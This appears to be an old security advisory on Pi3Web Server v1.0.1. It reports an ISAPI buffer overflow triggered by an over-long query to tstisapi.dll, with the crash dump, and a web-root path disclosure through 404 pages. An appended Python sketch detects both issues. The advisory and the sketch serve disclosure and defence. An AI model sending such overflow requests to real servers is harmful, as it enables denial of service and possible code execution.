Vulnerability

    Pi3Web Server

Affected

    Pi3Web Server v1.0.1

Description

    Joe Testa found the following. Pi3Web v1.0.1 is a web server. A vulnerability exists in the server's internal ISAPI handling procedures which results in a buffer overflow. The server also reveals the physical path of the web root upon encountering a 404 error.

    Here is an example URL that overflows a buffer in Pi3Web's executable:

        http://localhost/isapi/tstisapi.dll?[a lot of 'A's]

    This results in the following crash:

        ENHPI3 caused an invalid page fault in
        module <unknown> at 0000:41414141.
        Registers:
        EAX=00000001 CS=017f EIP=41414141 EFLGS=00010206
        EBX=0123d1b0 SS=0187 ESP=041df3b0 EBP=041dfed4
        ECX=00000000 DS=0187 ESI=041df3f0 FS=3e6f
        EDX=00000000 ES=0187 EDI=00000000 GS=0000
        Bytes at CS:EIP:

        Stack dump:
        41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141
        41414141 00bb0b2c 00000000 05611030

    EIP and most of the stack dump hold 0x41, the ASCII code for 'A', which shows that data from the request reached the instruction pointer.

    To discover the physical path of the web root:

        http://localhost/[any string which causes a 404 error]

    The server responds with:

        The original URL path was: /sadfasdf
        The mapped physical path was: C:\PI3WEB\WebRoot\sadfasdf

Solution

    The buffer overflow can be prevented by deleting the ISAPI module named 'tstisapi.dll'. There is no quick solution for the web root disclosure. The author, John Roy, was contacted on February 5, 2001. No reply was received.
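
Detection sketch for the two issues above, added here as an example and not part of the original advisory or of Pi3Web. It flags over-long query strings sent to /isapi/ in an access log and checks an error page for the path-disclosure wording. The Common Log Format input, the 512-byte threshold and all function names are assumptions.

```python
import re

# Assumption: the advisory gives no buffer size ("a lot of 'A's"), so this
# threshold is a tunable guess, not a value from the advisory.
MAX_QUERY_LEN = 512

# Common Log Format request field: "METHOD target PROTOCOL" status
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Wording of the Pi3Web 404 page quoted in the advisory.
DISCLOSURE_RE = re.compile(r"The mapped physical path was:\s*(?P<path>[A-Za-z]:\\\S+)")


def flag_isapi_requests(log_lines, max_query_len=MAX_QUERY_LEN):
    """Return (line_no, path, query_len) for over-long queries sent to /isapi/."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line in the assumed format
        path, _, query = match.group("target").partition("?")
        if path.lower().startswith("/isapi/") and len(query) > max_query_len:
            hits.append((line_no, path, len(query)))
    return hits


def disclosed_path(response_body):
    """Return the physical path leaked by an error page, or None."""
    match = DISCLOSURE_RE.search(response_body)
    return match.group("path") if match else None


# Constructed sample data (not taken from a real server).
SAMPLE_LOG = [
    '127.0.0.1 - - [05/Feb/2001:10:00:00 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '127.0.0.1 - - [05/Feb/2001:10:00:05 +0000] "GET /isapi/tstisapi.dll?name=test HTTP/1.0" 200 312',
    '127.0.0.1 - - [05/Feb/2001:10:00:09 +0000] "GET /isapi/tstisapi.dll?' + "A" * 2000 + ' HTTP/1.0" 500 0',
]
SAMPLE_404 = ("The original URL path was: /sadfasdf\n"
              "The mapped physical path was: C:\\PI3WEB\\WebRoot\\sadfasdf\n")

if __name__ == "__main__":
    for line_no, path, qlen in flag_isapi_requests(SAMPLE_LOG):
        print(f"line {line_no}: {qlen}-byte query to {path}")
    print("404 page leaks:", disclosed_path(SAMPLE_404))
```

A request that crashes the server may never be written to its own access log, so the log check is best run against a front-end proxy or network capture that records the request line.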